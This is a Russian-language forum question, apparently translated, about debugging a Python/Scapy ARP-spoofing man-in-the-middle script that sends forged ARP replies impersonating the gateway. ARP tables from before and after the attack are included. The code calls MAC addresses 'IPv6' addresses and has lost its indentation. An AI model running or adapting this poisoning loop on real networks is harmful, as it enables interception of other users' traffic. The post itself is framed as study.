Я пытаюсь создать атаку MITM с использованием ARP Spoofing просто для изучения, и когда я выполняю сценарий, шлюз по умолчанию моей машины также изменяется, даже если я не отправляю пакет ARP на мою машину.
Что я пытался сделать, чтобы это исправить:
Я пытался отправить пакет ARP только на мой компьютер, который изменяет IPv6-адрес шлюза по умолчанию обратно на исходный IPv6-адрес, но этопохоже, не работает.
Вот код отравления:
def poison():
global threadGo
ip_to_infect = sys.argv[1]
ip_to_infect_v6 = sys.argv[2]
default_gateway = sys.argv[3]
my_ip_v6 = Ether().src
poison_packet = ARP(hwsrc=my_ip_v6,hwdst=ip_to_infect_v6, pdst=ip_to_infect,psrc=default_gateway, op=2)
# My attempt at fixing it below this line
my_ip = IP().src
default_gate = "*default_gateway*"
restore_my_self = ARP(psrc=default_gateway, hwsrc=default_gate, hwdst=my_ip_v6, pdst=my_ip)
# My attempt at fixing the problem is above this line
print("[+] Poisoning %s\n" % (ip_to_infect))
while True:
send(restore_my_self, count=1, verbose=False)
send(poison_packet,count=1, verbose=False) # Attempt to fix
Это список arp атакующей машины до:
Address HWtype HWaddress Flags Mask Iface
10.0.0.138 ether *default_gateway* C wlp3s
и после:
Address HWtype HWaddress Flags Mask Iface
10.0.0.138 ether *my_ip_v6* C wlp3s
И это список arp моей машины до:
Internet Address Physical Address Type
10.0.0.138 *default_gateway* dynamic
и после:
Internet Address Physical Address Type
10.0.0.138 *my_ip_v6* dynamic
РЕДАКТИРОВАТЬ: я просто использовал wireshark, чтобы посмотреть, что происходит,и по какой-то причине я отправляю пакеты ARP на мою машину.Что здесь происходит?